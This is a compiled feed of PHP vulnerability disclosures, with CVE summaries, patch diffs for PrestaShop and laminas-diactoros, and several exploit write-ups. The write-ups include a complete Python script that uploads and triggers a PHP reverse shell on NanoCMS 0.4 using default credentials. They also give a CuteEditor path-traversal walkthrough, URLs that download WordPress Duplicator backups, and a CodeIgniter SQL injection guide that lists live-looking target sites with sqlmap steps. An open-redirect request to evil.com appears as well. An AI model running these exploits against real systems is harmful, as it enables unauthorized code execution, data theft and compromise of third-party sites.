Pharmacy Management System v1.0 was discovered to contain a SQL injection vulnerability via the startDate parameter at getproductreport.php.

CVE-2022-34945

PyroCMS v3.9 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities.

CVE-2022-35118: AARO-Bugs/AARO-CVE-List.md at master · Accenture/AARO-Bugs

PrestaShop is an Open Source e-commerce platform. In versions from 1.6.0.10 and before 1.7.8.7 PrestaShop is subject to an SQL injection vulnerability which can be chained to call PHP's Eval function on attacker input. The problem is fixed in version 1.7.8.7. Users are advised to upgrade. Users unable to upgrade may delete the MySQL Smarty cache feature.

@@ -25,6 +25,14 @@

\*/

class Smarty\_CacheResource\_Mysql extends Smarty\_CacheResource\_Custom

{

/\*\* @var PhpEncryption \*/

private $phpEncryption;

  

public function \_\_construct()

{

$this\->phpEncryption = new PhpEncryption(\_NEW\_COOKIE\_KEY\_);

}

  

/\*\*

\* fetch cached content and its modification time from data source.

\*

@@ -39,7 +47,7 @@ protected function fetch($id, $name, $cache\_id, $compile\_id, &$content, &$mtime)

{

$row = Db::getInstance()->getRow('SELECT modified, content FROM ' . \_DB\_PREFIX\_ . 'smarty\_cache WHERE id\_smarty\_cache = "' . pSQL($id, true) . '"');

if ($row) {

$content = $row\['content'\];

$content = $this\->phpEncryption\->decrypt($row\['content'\]);

$mtime = strtotime($row\['modified'\]);

} else {

$content = null;

@@ -87,7 +95,7 @@ protected function save($id, $name, $cache\_id, $compile\_id, $exp\_time, $content)

"' . pSQL($id, true) . '",

"' . pSQL(sha1($name)) . '",

"' . pSQL($cache\_id, true) . '",

"' . pSQL($content, true) . '"

"' . $this\->phpEncryption\->encrypt($content) . '"

)');

  

return (bool) Db::getInstance()->Affected\_Rows();

CVE-2022-31181: Merge pull request from GHSA-hrgx-p36p-89q4 · PrestaShop/PrestaShop@b6d96e7

laminas-diactoros is a PHP package containing implementations of the PSR-7 HTTP message interfaces and PSR-17 HTTP message factory interfaces. Applications that use Diactoros, and are either not behind a proxy, or can be accessed via untrusted proxies, can potentially have the host, protocol, and/or port of a `Laminas\Diactoros\Uri` instance associated with the incoming server request modified to reflect values from `X-Forwarded-*` headers. Such changes can potentially lead to XSS attacks (if a fully-qualified URL is used in links) and/or URL poisoning. Since the `X-Forwarded-*` headers do have valid use cases, particularly in clustered environments using a load balancer, the library offers mitigation measures only in the v2 releases, as doing otherwise would break these use cases immediately. Users of v2 releases from 2.11.1 can provide an additional argument to `Laminas\Diactoros\ServerRequestFactory::fromGlobals()` in the form of a `Laminas\Diactoros\RequestFilter\RequestFilterInterface` instance, including the shipped `Laminas\Diactoros\RequestFilter\NoOpRequestFilter` implementation which ignores the `X-Forwarded-*` headers. Starting in version 3.0, the library will reverse behavior to use the `NoOpRequestFilter` by default, and require users to opt-in to `X-Forwarded-*` header usage via a configured `Laminas\Diactoros\RequestFilter\LegacyXForwardedHeaderFilter` instance. Users are advised to upgrade to version 2.11.1 or later to resolve this issue. Users unable to upgrade may configure web servers to reject `X-Forwarded-*` headers at the web server level.

@@ -0,0 +1,112 @@ # Server Request Filters  
INFO: \*\*New Feature\*\* Available since version 2.11.1  
Server request filters allow you to modify the initial state of a generated \`ServerRequest\` instance as returned from \`Laminas\\Diactoros\\ServerRequestFactory::fromGlobals()\`. Common use cases include:  
\- Generating and injecting a request ID. \- Modifying the request URI based on headers provided (e.g., based on the \`X-Forwarded-Host\` or \`X-Forwarded-Proto\` headers).  
## FilerServerRequestInterface  
A request filter implements \`Laminas\\Diactoros\\ServerRequestFilter\\FilterServerRequestInterface\`:  
\`\`\`php namespace Laminas\\Diactoros\\ServerRequestFilter; use Psr\\Http\\Message\\ServerRequestInterface; interface FilterServerRequestInterface { public function \_\_invoke(ServerRequestInterface $request): ServerRequestInterface; } \`\`\`  
## Implementations  
We provide the following implementations:  
\- \`DoNotFilter\`: returns the provided \`$request\` verbatim. \- \`FilterUsingXForwardedHeaders\`: if the originating request comes from a trusted proxy, examines the \`X-Forwarded-\*\` headers, and returns the request instance with a URI instance that reflects those headers.  
### DoNotFilter  
This filter returns the \`$request\` argument back verbatim when invoked.  
### FilterUsingXForwardedHeaders  
Servers behind a reverse proxy need mechanisms to determine the original URL requested. As such, reverse proxies have provided a number of mechanisms for delivering this information, with the use of \`X-Forwarded-\*\` headers being the most prevalant. These include:  
\- \`X-Forwarded-Host\`: the original \`Host\` header value. \- \`X-Forwarded-Port\`: the original port included in the \`Host\` header value. \- \`X-Forwarded-Proto\`: the original URI scheme used to make the request (e.g., "http" or "https").  
\`Laminas\\Diactoros\\ServerRequestFilter\\FilterUsingXForwardedHeaders\` provides named constructors for choosing whether to never trust proxies, always trust proxies, or choose wich proxies and/or headers to trust in order to modify the URI composed in the request instance to match the original request. These named constructors are:  
\- \`FilterUsingXForwardedHeadersFactory::trustProxies(string\[\] $proxyCIDRList, string\[\] $trustedHeaders = FilterUsingXForwardedHeaders::X\_FORWARDED\_HEADERS): void\`: when this method is called, only requests originating from the trusted proxy/ies will be considered, as well as only the headers specified. Proxies may be specified by IP address, or using \[CIDR notation\](https://en.wikipedia.org/wiki/Classless\_Inter-Domain\_Routing) for subnets; both IPv4 and IPv6 are accepted. The special string "\*" will be translated to two entries, \`0.0.0.0/0\` and \`::/0\`. \- \`FilterUsingXForwardedHeaders::trustAny(): void\`: when this method is called, the filter will trust requests from any origin, and use any of the above headers to modify the URI instance. It is functionally equivalent to \`FilterUsingXForwardedHeaders::trustProxies(\['\*'\])\`. \- \`FilterUsingXForwardedHeaders::trustReservedSubnets(): void\`: when this method is called, the filter will trust requests made from reserved, private subnets. It is functionally equivalent to \`FilterUsingXForwardedHeaders::trustProxies()\` with the following elements in the \`$proxyCIDRList\`: \- 10.0.0.0/8 \- 127.0.0.0/8 \- 172.16.0.0/12 \- 192.168.0.0/16 \- ::1/128 (IPv6 localhost) \- fc00::/7 (IPv6 private networks) \- fe80::/10 (IPv6 local-link addresses)  
Internally, the filter checks the \`REMOTE\_ADDR\` server parameter (as retrieved from \`getServerParams()\`) and compares it against each proxy listed; the first to match indicates trust.  
#### Constants  
The \`FilterUsingXForwardedHeaders\` defines the following constants for use in specifying various headers:  
\- \`HEADER\_HOST\`: corresponds to \`X-Forwarded-Host\`. \- \`HEADER\_PORT\`: corresponds to \`X-Forwarded-Port\`. \- \`HEADER\_PROTO\`: corresponds to \`X-Forwarded-Proto\`.  
#### Example usage  
Trusting all \`X-Forwarded-\*\` headers from any source:  
\`\`\`php $filter = FilterUsingXForwardedHeaders::trustAny(); \`\`\`  
Trusting only the \`X-Forwarded-Host\` header from any source:  
\`\`\`php $filter = FilterUsingXForwardedHeaders::trustProxies('0.0.0.0/0', \[FilterUsingXForwardedHeaders::HEADER\_HOST\]); \`\`\`  
Trusting the \`X-Forwarded-Host\` and \`X-Forwarded-Proto\` headers from a single Class C subnet:  
\`\`\`php $filter = FilterUsingXForwardedHeaders::trustProxies( '192.168.1.0/24', \[FilterUsingXForwardedHeaders::HEADER\_HOST, FilterUsingXForwardedHeaders::HEADER\_PROTO\] ); \`\`\`  
Trusting the \`X-Forwarded-Host\` header from either a Class A or a Class C subnet:  
\`\`\`php $filter = FilterUsingXForwardedHeaders::trustProxies( \['10.1.1.0/16', '192.168.1.0/24'\], \[FilterUsingXForwardedHeaders::HEADER\_HOST, FilterUsingXForwardedHeaders::HEADER\_PROTO\] ); \`\`\`  
Trusting any \`X-Forwarded-\*\` header from any private subnet:  
\`\`\`php $filter = FilterUsingXForwardedHeaders::trustReservedSubnets(); \`\`\`

CVE-2022-31109: Merge pull request from GHSA-8274-h5jp-97vr · laminas/laminas-diactoros@25b11d4

NanoCMS version 0.4 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-26# Exploit Auuthor: p1ckzi# Vendor Homepage: https://github.com/kalyan02/NanoCMS# Version: NanoCMS v0.4# Tested on: Linux Mint 20.3# CVE: N/A## Description:# this script uploads a php reverse shell to the target.# NanoCMS does not sanitise the data of an authenticated user while creating# webpages. pages are saved with .php extensions by default, allowing an# authenticated attacker access to the underlying system:# https://github.com/ishell/Exploits-Archives/blob/master/2009-exploits/0904-exploits/nanocms-multi.txt#!/usr/bin/env python3import argparseimport bs4import errnoimport reimport requestsimport secretsimport sysdef arguments():    parser = argparse.ArgumentParser(        formatter_class=argparse.RawDescriptionHelpFormatter,        description=f"{sys.argv[0]} exploits authenticated file upload"        "\nand remote code execution in NanoCMS v0.4",        epilog=f"examples:"        f"\n\tpython3 {sys.argv[0]} http://10.10.10.10/ rev.php"        f"\n\tpython3 {sys.argv[0]} http://hostname:8080 rev-shell.php -a"        f"\n\t./{sys.argv[0]} https://10.10.10.10 rev-shell -n -e -u 'user'"    )    parser.add_argument(        "address", help="schema/ip/hostname, port, sub-directories"        " to the vulnerable NanoCMS server"    )    parser.add_argument(        "file", help="php file to upload"    )    parser.add_argument(        "-u", "--user", help="username", default="admin"    )    parser.add_argument(        "-p", "--passwd", help="password", default="demo"    )    parser.add_argument(        "-e", "--execute", help="attempts to make a request to the uploaded"        " file (more useful if uploading a reverse shell)",        action="store_true", default=False    )    parser.add_argument(        "-a", "--accessible", help="turns off features"        " which may negatively affect screen readers",        action="store_true", default=False    )    parser.add_argument(        "-n", "--no-colour", help="removes colour output",        action="store_true", default=False    )    arguments.option = parser.parse_args()# settings for terminal output defined by user in term_settings().class settings():    # colours.    c0 = ""    c1 = ""    c2 = ""    # information boxes.    i1 = ""    i2 = ""    i3 = ""    i4 = ""# checks for terminal setting flags supplied by arguments().def term_settings():    if arguments.option.accessible:        small_banner()    elif arguments.option.no_colour:        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    elif not arguments.option.accessible or arguments.option.no_colour:        settings.c0 = "\u001b[0m"       # reset.        settings.c1 = "\u001b[38;5;1m"  # red.        settings.c2 = "\u001b[38;5;2m"  # green.        settings.i1 = "[+] "        settings.i2 = "[!] "        settings.i3 = "[i] "        settings.i4 = "$ "        banner()    else:        print("something went horribly wrong!")        sys.exit()# default terminal banner (looks prettier when run lol)def banner():    print(        "\n                                                  .__           .__"        "  .__   "        "\n  ____ _____    ____   ____   ____   _____   _____|  |__   ____ |  "        "| |  |  "        "\n /    \\__   \\  /    \\ /  _ \\_/ ___\\ /     \\ /  ___/  |  \\_/ "        "__ \\|  | |  |  "        "\n|   |  \\/ __ \\|   |  (  <_> )  \\___|  Y Y  \\___  \\|   Y  \\  _"        "__/|  |_|  |__"        "\n|___|  (____  /___|  /\\____/ \\___  >__|_|  /____  >___|  /\\___  "        ">____/____/"        "\n     \\/     \\/     \\/            \\/      \\/     \\/     \\/   "        "  \\/"    )def small_banner():    print(        f"{sys.argv[0]}"        "\nNanoCMS authenticated file upload and rce..."    )# appends a '/' if not supplied at the end of the address.def address_check(address):    check = re.search('/$', address)    if check is not None:        print('')    else:        arguments.option.address += "/"# creates a new filename for each upload.# errors occur if the filename is the same as a previously uploaded one.def random_filename():    random_filename.name = secrets.token_hex(4)# note: after a successful login, credentials are saved, so further reuse# of the script will most likely not require correct credentials.def login(address, user, passwd):    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "user": f"{user}",        "pass": f"{passwd}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    signin_error = url_request.text    if 'Error : wrong Username or Password' in signin_error:        print(            f"{settings.c1}{settings.i2}could "            f"sign in with {arguments.option.user}/"            f"{arguments.option.passwd}.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}logged in successfully."            f"{settings.c0}"        )def exploit(address, file, name):    with open(arguments.option.file, 'r') as file:        file_contents = file.read().rstrip()    post_header = {        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) "        "Gecko/20100101 Firefox/91.0",        "Accept": "text/html,application/xhtml+xml,"        "application/xml;q=0.9,image/webp,*/*;q=0.8",        "Accept-Language": "en-US,en;q=0.5",        "Accept-Encoding": "gzip, deflate",        "Content-Type": "application/x-www-form-urlencoded",        "Content-Length": "",        "Connection": "close",        "Referer": f"{arguments.option.address}data/nanoadmin.php?action="        "addpage",        "Cookie": "PHPSESSID=46ppbqohiobpvvu6olm51ejlq5",        "Upgrade-Insecure-Requests": "1",    }    post_data = {        "title": f"{random_filename.name}",        "save": "Add Page",        "check_sidebar": "sidebar",        "content": f"{file_contents}"    }    url_request = requests.post(        address + 'data/nanoadmin.php?action=addpage',        headers=post_header,        data=post_data,        verify=False,        timeout=30    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.address} could "            f"not be uploaded.{settings.c0}"        )        sys.exit(1)    else:        print(            f"{settings.c2}{settings.i1}file posted."            f"{settings.c0}"        )    print(        f"{settings.i3}if successful, file location should be at:"        f"\n{address}data/pages/{random_filename.name}.php"    )def execute(address, file, name):    print(            f"{settings.i3}making web request to uploaded file."    )    print(            f"{settings.i3}check listener if reverse shell uploaded."        )    url_request = requests.get(        address + f'data/pages/{random_filename.name}.php',        verify=False    )    if url_request.status_code == 404:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} could "            f"not be found."            f"\n{settings.i2}antivirus may be blocking your upload."            f"{settings.c0}"        )    else:        sys.exit()def main():    try:        arguments()        term_settings()        address_check(arguments.option.address)        random_filename()        if arguments.option.execute:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )            execute(                arguments.option.address,                arguments.option.file,                random_filename.name,            )        else:            login(                arguments.option.address,                arguments.option.user,                arguments.option.passwd            )            exploit(                arguments.option.address,                arguments.option.file,                random_filename.name,            )    except KeyboardInterrupt:        print(f"\n{settings.i3}quitting.")        sys.exit()    except requests.exceptions.Timeout:        print(            f"{settings.c1}{settings.i2}the request timed out "            f"while attempting to connect.{settings.c0}"        )        sys.exit()    except requests.ConnectionError:        print(            f"{settings.c1}{settings.i2}could not connect "            f"to {arguments.option.address}{settings.c0}"        )        sys.exit()    except FileNotFoundError:        print(            f"{settings.c1}{settings.i2}{arguments.option.file} "            f"could not be found.{settings.c0}"        )    except (        requests.exceptions.MissingSchema,        requests.exceptions.InvalidURL,        requests.exceptions.InvalidSchema    ):        print(            f"{settings.c1}{settings.i2}a valid schema and address "            f"must be supplied.{settings.c0}"        )        sys.exit()if __name__ == "__main__":    main()

NanoCMS 0.4 Remote Code Execution

CuteEditor For PHP version 6.6 suffers from a directory traversal vulnerability.

    # Exploit Title: CuteEditor for PHP 6.6 - Directory Traversal# Google Dork: N/A# Date: November 17th, 2021# Exploit Author: Stefan Hesselman# Vendor Homepage: http://phphtmledit.com/# Software Link: http://phphtmledit.com/download/phphtmledit.zip# Version: 6.6# Tested on: Windows Server 2019# CVE : N/AThere is a path traversal vulnerability in the browse template feature in CuteEditor for PHP via the "rename file" option. An attacker with access to CuteEditor functions can write HTML templates to any directory inside the web root.File: /phphtmledit/cuteeditor_files/Dialogs/Include_Security.php, Lines: 109-121Vulnerable code:[SNIP]  function ServerMapPath($input_path,$absolute_path,$virtual_path)  {    if($absolute_path!="")    {    return $absolute_path.str_ireplace($virtual_path,"",$input_path);    }    else    {    if(strtoupper(substr(PHP_OS, 0, 3) === 'WIN'))    {    if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['SCRIPT_FILENAME'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));} if(empty($_SERVER['DOCUMENT_ROOT']) && !empty($_SERVER['PATH_TRANSLATED'])) {   $_SERVER['DOCUMENT_ROOT'] = str_replace( '\\', '/', substr(str_replace('\\\\', '\\', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));}        return $_SERVER["DOCUMENT_ROOT"].$input_path;    }    else    {      return ucfirst($_SERVER["DOCUMENT_ROOT"]).$input_path;     }    }  }[SNIP]ServerMapPath() takes 3 arguments: $input_path, $absolute_path, and $virtual_path and is used, among others, in the browse_template.php file.File:/phphtmledit/cuteeditor_files/Dialogs/browse_Template.php, Lines: 47-56Vulnerable function (renamefile, line 57):[SNIP]switch ($action){[SNIP]  case "renamefile":    rename(ServerMapPath($_GET["filename"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath),ServerMapPath($_GET["newname"],$AbsoluteTemplateGalleryPath,$TemplateGalleryPath));    print "<script language=\"javascript\">parent.row_click('".$_GET["newname"]."');</script>";    break;[SNIP]$input_path is $_GET["filename"] and is under control of the attacker. If an attacker uploads and renames the HTML template to '..\..\..\poc.html', it becomes:C:\Inetpub\wwwroot\..\..\..\poc.htmlFinal result: writes poc.html to the webroot.STEPS:1. Create a poc.html file (XSS PoC will do).<HTML><title>Path Traversal PoC</title><BODY><h1>PoC</h1><script>alert('directory traversal');</script></BODY></HTML>2. Upload poc.html via the "Insert Templates" page using the "Upload files" option.3. Select poc.html and select "Rename File".4. Click on the pencil icon to the right of the poc.html file.5. Rename file to "..\..\..\poc.html".6. Press OK. poc.html is written three directories up.This may require more or less dot dot slash (..\ or ../) depending on the size of your directory tree. Adjust slashes as needed.

CuteEditor For PHP 6.6 Directory Traversal

WordPress Duplicator plugin versions 1.4.6 and below suffer from a backup disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: < 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2551# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2551#Product:WordPress Plugin Duplicator < 1.4.7#Vulnerability:1-It allows an attacker to download the backup file.#Proof-Of-Concept:1-Backup download.The backup file can be downloaded using the "is_daws" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.6 Backup Disclosure

WordPress Duplicator plugin versions 1.4.7 and below suffer from an information disclosure vulnerability.

    # Exploit Title: WordPress Plugin Duplicator 1.4.7 - Information Disclosure# Google Dork: N/A# Date: 07.27.2022# Exploit Author: SecuriTrust# Vendor Homepage: https://snapcreek.com/# Software Link: https://wordpress.org/plugins/duplicator/# Version: <= 1.4.7# Tested on: Linux, Windows# CVE : CVE-2022-2552# Reference: https://securitrust.fr# Reference: https://github.com/SecuriTrust/CVEsLab/CVE-2022-2552#Product:WordPress Plugin Duplicator <= 1.4.7#Vulnerability:1-Some system information may be disclosure.#Proof-Of-Concept:1-System information.Some system information is obtained using the "view" parameter.http://[PATH]/backups-dup-lite/dup-installer/main.installer.php

WordPress Duplicator 1.4.7 Information Disclosure

CodeIgniter CMS version 4.2.0 suffers from a remote SQL injection vulnerability.

    [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]                                                                                      [+]Exploit Title    : CodeIgniter CMS Version 4.2.0  Sql Injection Vulnerability                         [+]                                                                                         [+]Exploit Author   : E1.Coders                                           [+]                                                                                          [+]Vendor Homepage  : https://www.codeigniter.com/                                       [+]                                                                                       [+]Google Dork ONE  : searchResult/?title=[+]    [+]Google Dork Two  : Job/searchResult/?title=  [+]                                                                                     [+]Date             : 15 / 05 / 2022                                                                [+]                                                                                     [+]Tested On        : windows + linux                                              [+]                                                                                        [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>DESCRITION   <~ ~ ~ [+] [+] CodeIgniter CMS suffers from a remote SQL injection vulnerability. [+] "codeigniter vulnerability ::$DATA view source code"[+] Note that this find contains information about the site.[+] CodeIgniter CMS SQL injection vulnerabilities were found and confirmed in the software as an anonymous user.[+] A successful attack could allow an unknown attacker to access information such as username and password hashes stored in the database.[+] The following URLs and parameters have been confirmed to suffer from SQL injection.                                                                                        [+] [+]~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~>  Location   <~ ~ ~                           [+] SQL ERROR Location                                                                                        [+] http://www.site.com/Job/searchResult/?title=[SQL]                                              [+] [+]~ ~ ~~ ~ ~~  ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~~ ~ ~ ~~ ~ ~~ ~ ~~ ~~~~~~ ~~ ~>   DEMO      <~ ~ ~                       [+][+][+] ERROR : https://[removed].com/Job/searchResult/?title=123%27[+][+] ERROR : https://[removed].com/Job/city/%D8%A7%D8%B3%D8%AA%D8%AE%D8%AF%D8%A7%D9%85-%D9%85%D8%B4%D9%87%D8%AF'  (OR= or ==)[+][+] ERROR : https://[removed].ir/?per_page=400%2[+][+] ERROR : https://[removed].ir/Job/search/NULL/%D8%A2%D8%A8%D8%A7%D8%AF%D8%A7%D9%86'/NULL/NULL/0[+] [+] ERROR : https://[removed].com/login/       (username = '  Password = ')[+][+] ERROR : https://[removed].com/search.php?search=1'[+][+] ERROR : https://[removed].com/news.php?p=7251'[+][+] ERROR : https://[removed].com/employe/show.php?cvid=14088'[+][+] ERROR : https://[removed].com/states/%D8%AA%D9%87%D8%B1%D8%A7%D9%86'[+][+] ERROR : https://[removed].com/fa/index.asp?p=search&search=1[+][+] ERROR : https://[removed].com/fa/FormView/1026'[+][+] ERROR : https://[removed].com/fa/formview/1030' [+] And Google More . . . \ .[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]  Methode Attack :[+]  [+] Step 1 : Enter the URL of the page that has the problem of sql injection attacks[+] [+] Step 2 :  Add a variable "  OR ' to the end of  the URL "request"[+] To display the PHP error related to not controlling the functions that cause the attacker to attack  '[+] [+] Step 3 :  Use sqlmap: python sqlmap.py -u "https://[removed].com/Job/searchResult/?title=123"[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] About CMS :[+] [+] Codeigniter is an open source web software framework used to build dynamic websites. [+] This framework, which is written in PHP language, [+] accelerates the development of software by coding from the beginning. This acceleration is done by the framework's libraries, [+] many of which make common tasks simple. The first public release of CodeIgniter was on February 28, 2006[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Explanation of vulnerability :[+] [+] The remote attacker can test the SQL Inject attack by injecting a 'variable' and after displaying the PHP error related to not controlling the functions that cause the SQL Inject attack[+] And the attacker can execute attacks with SQL Inject commands or execute attacks with ready tools such as Squat Map.[+] [+] All different parts of the site have this security problem[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Solution :[+] [+] [+] Use parameter input validation to be modified to prevent attacks[+] "codeigniter vulnerability ::$DATA view source code"[+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

CodeIgniter CMS 4.2.0 SQL Injection

WordPress SeatReg plugin version 1.23.0 suffers from an open redirection vulnerability.

    # Exploit Title: WordPress Plugin ‘SeatReg’  - Unauthenticated OpenRedirect# Date: 01-08-2022# Exploit Author: Mariam Tariq - HunterSherlock# Vendor Homepage: https://wordpress.org/plugins/seatreg/# Version: 1.23.0# Tested on: Firefox# Contact me: mariamtariq404@gmail.com*#Description:*An Open Redirection is a vulnerability when a web application or serveruses an unvalidated user-submitted link to redirect the user to a givenwebsite or page.*#Example of Burp Request *```POST /wp-admin/admin-post.php HTTP/1.1Host: website.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)Gecko/20100101 Firefox/103.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: https://website.comContent-Type: application/x-www-form-urlencodedContent-Length: 185Origin: https://website.comConnection: closeCookie: {cookies_here}Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: NavigateSec-Fetch-Site: same-originnew-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com<https://evil.com>*&submit=Create+new+registration```*#PoC Image:*https://ibb.co/tCZWH0Hhttps://ibb.co/5kh299z

Tag

#php